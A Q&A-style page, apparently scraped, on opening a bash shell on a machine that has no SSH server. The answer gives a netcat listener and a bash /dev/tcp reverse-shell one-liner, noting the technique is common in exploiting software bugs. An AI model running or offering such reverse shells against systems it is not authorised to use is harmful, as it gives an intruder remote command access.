I have a machine without SSHD and I want to open a bash shell on this machine from a remote machine (that I can fully control).
Since I have SSH on my limited machine, I configured a reverse proxy:
$ ssh -R 19999:localhost:22 remoteuser@remotemachine
Now I have a connection on port 19999 from my "fully control" machine to my "limited" machine. How would I open a shell with this setup?
You can pipe the input from some port directly to the bash. This is common practice when misusing various bugs in software. For example, run on your full-access machine:
nc -lvp 9999
And on the limited machine
/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1
Where the 192.168.122.1 is the IP of the full-control machine.
This will give you a shell of the second machine in the first one. But note that the connection is not encrypted. If you want encryption, you would need to add the TCP forwarding step (similar as you propose above).
{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1515056452',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://img.manongdao.com/sparkler-677774__340.jpg', '推荐 贼婆χ 的文章《How to open a shell without SSHD on the receiving 》','https://www.manongdao.com/article-891304.html','页面编码gb2312|utf-8默认gb2312'));){kind=link}